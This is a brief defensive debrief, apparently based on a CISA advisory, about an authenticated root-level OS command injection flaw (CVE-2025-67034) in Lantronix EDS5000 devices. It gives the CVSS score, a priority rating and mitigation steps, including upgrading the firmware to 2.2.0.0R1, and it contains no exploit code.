CVE-2025-67034 Unknown Vendor CVE debrief

Who should care

Organizations operating Lantronix EDS5000 devices, especially OT/ICS teams, network administrators, and security teams responsible for privileged management access and firmware maintenance.

Technical summary

The CISA advisory states that an authenticated attacker can inject OS commands into the "name" parameter during SSL credential deletion through the management interface. The supplied advisory notes that the resulting commands run with root privileges. The provided CVSS v3.1 vector is AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H (7.2 High), indicating network-reachable impact but requiring high privileges.

Defensive priority

High. Prioritize affected EDS5000 deployments that are reachable by management users and rely on privileged administrator accounts, because successful abuse can lead to root-level command execution.

Recommended defensive actions

• Upgrade affected Lantronix EDS5000 systems to version 2.2.0.0R1 as recommended in the advisory.
• Restrict management-interface access to trusted administrative networks and accounts only.
• Review privileged account usage and remove unnecessary administrative access.
• Monitor for unexpected command execution or configuration changes on affected devices.
• Apply general ICS hardening and access-control guidance from CISA for industrial control environments.

Evidence notes

This debrief is based on the supplied CISA CSAF advisory for ICSA-26-069-02 and its remediation guidance. The advisory explicitly describes authenticated OS command injection in the "name" parameter when deleting SSL credentials and states that injected commands execute with root privileges. The source also recommends upgrading EDS5000 firmware to 2.2.0.0R1. No additional exploitation details are included here.

Official resources